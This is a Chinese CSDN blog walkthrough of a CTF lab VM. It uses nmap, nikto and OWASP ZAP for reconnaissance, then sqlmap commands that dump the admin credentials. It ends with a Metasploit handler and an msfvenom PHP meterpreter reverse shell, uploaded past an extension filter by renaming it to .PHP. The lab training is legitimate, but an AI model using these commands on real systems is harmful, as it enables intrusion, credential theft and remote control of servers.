ctf训练 web安全SQL注入get

最新推荐文章于 2024-05-16 02:47:32 发布
最新推荐文章于 2024-05-16 02:47:32 发布
阅读量410 收藏 1
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43799246/article/details/110449523
版权

ctf训练 web安全SQL注入get

SQL注入漏洞介绍

sQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

SQL注入的产生原因通常表现在以下几方面:

  • ①不当的类型处理;
  • ②不安全的数据库配置;
  • ③不合理的查询集处理;
  • ④不当的错误处理;
  • ⑤转义字符处理不合适;
  • ⑥多个提交处理不当。

实验环境

一台kail攻击机 和 靶机
靶机镜像:https://pan.baidu.com/s/1EL48UHzkdUo049I1basrFg
提取码:hfvs

安装打开靶机(使用Oracle VM VirtualBox打开):
(注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!)

接下来发现没法登陆,也没有办法获取ip地址
所以我们在kail下
进入控制台

使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机,靶机ip为192.168.43.93
在这里插入图片描述在这里插入图片描述
本机ip为192.168.43.96
在这里插入图片描述

信息探测

扫描主机服务信息以及服务版本

– nmap -sV 靶场ip地址
在这里插入图片描述

快速扫描主机全部信息

– nmap -T4 -A -v 靶场ip地址
在这里插入图片描述探测敏感信息

– nikto -host http://靶场ip地址:端口
在这里插入图片描述在这里插入图片描述

深入挖掘

分析nmap 、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;

使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;
在这里插入图片描述可以试一试有没有弱口令,这个地方没有弱口令的存在

漏洞扫描

web漏洞扫描器owasp-zap
OWASP ZAP攻击代理服务器是世界上最受欢迎的免费安全工具之一。ZAP可以帮助您在开发和测试应用程序过程中,自动发现Web应用程序中的安全漏洞。另外,它也是一款提供给具备丰富经验的渗透测试人员进行人工安全测试的优秀工具。
在这里插入图片描述漏洞利用

针对web进行漏洞扫描
对扫描的结果进行分析。注意:如果具有sQl注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用sQL注入漏洞

在这里插入图片描述在这里插入图片描述– sqlmap -u url-dbs 查看数据库名
在这里插入图片描述

在这里插入图片描述

– sqlmap -u url -D “数据库名” --tables查看对应数据库中的数据表
在这里插入图片描述在这里插入图片描述

– sqlmap -u url -D “数据库名” -T “表名” -columns查看对应字段
在这里插入图片描述在这里插入图片描述

– sqlmap -u url -D“数据库名”-T“表名”-C“列名”-dump查看对应字段的值
在这里插入图片描述在这里插入图片描述然后这里我们得到了用户名admin和密码

接下来使用用户名和密码来进行登录操作

在这里插入图片描述
在这里插入图片描述
上传shell反弹权限

攻击机启动监听
在这里插入图片描述

msf > use exploit/multi/handler
在这里插入图片描述

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述show options
在这里插入图片描述

msf exploit(handler) > set lhost 攻击机P地址
在这里插入图片描述

msf exploit(handler) > set lport 4444
在这里插入图片描述再一次show options
在这里插入图片描述

生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机P地址lport=4444 -f raw>(root/Desktop / shell.php

在这里插入图片描述使用gedit在桌面上创建shellcode.php,把上面获得的shell粘贴进去
在这里插入图片描述

在这里插入图片描述到这里上传shellcode.php文件,结果失败了
在这里插入图片描述在这里插入图片描述然后按照提示,修改后缀为.PHP,然后上传,发现上传成功
在这里插入图片描述在这里插入图片描述

msf exploit(handler) > run
在这里插入图片描述然后拿到靶机的shell,这台靶机下没有flag,拿到权限就结束了!!!

爱吃香菜的哈哈
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
CTF相关了解
qq_44841017的博客
04-21 1532
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
最新发布
2401_84968222的博客
05-16 780
使用right()突破字符限制得到后一段flag值b-403a-8062-80f219ca1c30}好了大家已经明显看到了^和()绕过不同限制的区别那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)使用right()突破字符限制原文链接:https://blog.csdn.net/m0_73734159/article/details/134450773。
ctf训练 web安全命令注入漏洞
qq_43799246的博客
12-05 2127
ctf训练 web安全命令注入漏洞 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1FG3VbDmDGHY8rOtuOFhRxA 提取码:oues 安装打开靶机(使用Oracle VM VirtualBox打开): (注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!) 接下来发现没法登陆,也没有办法获取ip地址 所以我们在kail下 进入控制台 使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机 信息
ctf web 文件包含漏洞(例题)
weixin_49298265的博客
11-29 3668
文件包含漏洞 php://协议 php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。 一、php://filter 当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行base64编码,阻止其不执行。从而导致任意文件读取。 http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.
buuctf web_当HTTP状态代码不足时:处理Web API错误报告
cunhu2961的博客
01-05 246
buuctf web RESTful Web API设计的一个领域(经常被忽视)是如何报告与业务或应用程序相关的错误和问题。 首先要想到HTTP状态代码的正确用法,尽管它非常方便,但通常它的信息量还不够。 让我们以400错误请求为例。 是的,它明确指出该请求有问题,但是到底出了什么问题呢? RESTful的体系结构风格并不决定在这种情况下应该做什么,因此每个人都在发明自己的风格,约定和规范。 ...
国科大web安全中期CTF.pdf
11-22
常见的Web安全威胁包括SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等。 二、 FLAG 的获取 在这篇文章中,我们将通过三个挑战来获取FLAG。 2.1FLAG获取之Base64编码 在第一个挑战中,我们需要通过 F12 查看...
CTF工具之antsword(web).rar
09-16
antsword的核心功能在于帮助参赛者发现并利用Web应用中的漏洞,比如SQL注入、XSS跨站脚本攻击、文件包含漏洞等。 antsword的主要特点包括: 1. **多平台支持**:antsword支持Windows、Linux和Mac OS等多个操作系统...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
ctf编写
02-17
7. **Web安全**:Python可以用于构造SQL注入、XSS攻击的payload,`BeautifulSoup`库用于HTML解析,`scrapy`框架用于大规模网页抓取。 8. **取证分析**:Python可以读取日志文件、内存转储等,`pandas`库用于数据...
2023第七届一带一路暨金砖大赛之企业信息系统安全赛项样题
05-31
4. 任务二:SQL注入 * 任务描述:该系统存在漏洞,登陆系统找到隐藏信息,并将flag提交。 * 任务二:该系统存在漏洞,找到当前WEB系统所使用的数据库用户名。 * 任务三:该系统存在漏洞,找到数据库中的隐藏信息,...
CTF夺旗赛-GET参数注入
qq_39687353的博客
05-09 1451
个人笔记仅供参考 1.首先确保kali攻击机和靶机在同一个网段,使用ifconfig查看靶机ip 2.使用nmap -sn -PE 192.168.80.1/24命令扫描出同网段靶机ip 3.使用nmap -sV 192.168.80.132 命令扫描靶机开放服务端口 4.由于扫描出来的端口服务并没有大端口开放,因此存在大端口漏洞几率不高,所以我们再探测80端口使用命令dirb http://192.168.80.132:80 发现存在admin/login目录,于是在浏览器打开网
CTFSQL注入(get)
YkingH的博客
07-09 837
CTFWEBSQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序,而这些输入大都是sql语法里的一些组合,通过执行sql语句而执行攻击者所要的操作,其主要原因是程序没有细致的过滤用户输入的数据,致使非法数据侵入系统。 sql注入产生的原因,通常表现在: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 转义字符处理不合适 多个提交处理不当 信息探测 扫描主机服务信息及服务版本 nmap -sV 靶机ip地址 快速扫描主机全部信息 nmap
CTF---Web---SQL注入---04---F12network+XXF伪造+sqlmap跑文件
qq_22160557的博客
07-29 1125
文章目录前言一、题目描述二、解题步骤1、信息隐藏2、XXF伪造3、sqlmap文件注入三、总结 前言 题目分类: CTFWebSQL注入—04—F12network+XXF伪造+ sqlmap跑文件 一、题目描述 题目:Simple_Calc_1,简单计算器 提示:XFF伪造 二、解题步骤 1、信息隐藏 Step1:F12—>查看network,刷新一下,就可以看到/backend/目录, 提示:{“success”:true,“count”:2},是访问次数 2、XXF伪造 Step2:其
CTF---Web---SQL注入---10---get传参的删减
qq_22160557的博客
08-01 464
文章目录前言一、题目描述二、解题步骤1、注入点的确定2、爆字段三、总结 前言 题目分类: CTFWebSQL注入—10—get传参的删减 一、题目描述 题目:小试牛刀 二、解题步骤 1、注入点的确定 Step1:利用http://172.16.15.193/stage/9/get_info.php?title=xiaoshiniudao&order=id 这个网址跑sqlmap,提示title不是注入点。 Step2:此题为get传参,参数可以删减。猜测注入点为order。 sqlm
CTFweb学习记录 -- 命令注入
lifanxin的博客
07-04 1319
命令注入概述常见攻击方式使用管道符号escapeshellarg和escapeshellcmd命令执行漏洞修复总结 概述   web服务器后端代码有时会调用一些执行系统命令的函数,以常见的php语言为例,使用system/exec/shell_exec/passthru/popen/proc_popen等函数可以执行系统命令。因此一旦我们可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。 常见攻击方式 使用管道符号   我们以一段简单的php代码为
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 388
个人CTF学习之路
国内首本CTF赛事技术解析书籍,五年之约,兑现了
华章IT官方博客
07-01 934
新书速递每一个CTF战队的发展其实都面临着一个问题,那就是“如何传承”。作为一个联合战队,随着老成员走向工作岗位,如何用良好的机制实现新老更替,是战队管理者需要认真考虑的问题。我们也尝...
2021-08-04 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(Python版)
热门推荐
时光隧道
08-04 5万+
以django框架为例 第一步::构造/…/…/…/…/…/…/etc/passwd,访问到系统根目录 首先找到,static静态目录就可以穿越目录了 static/../../../../../../../../../etc/passwd django框架:__pycache__目录下,其中pyc,pyc问源码缓存文件 第二步::ORM 首先找到,static静态目录就可以穿越目录了 static/../../../../../../../../../etc/passwd django框架:__pyc
web安全入门ppt课件.ppt
11-16
web安全入门ppt课件.ppt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃香菜的哈哈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值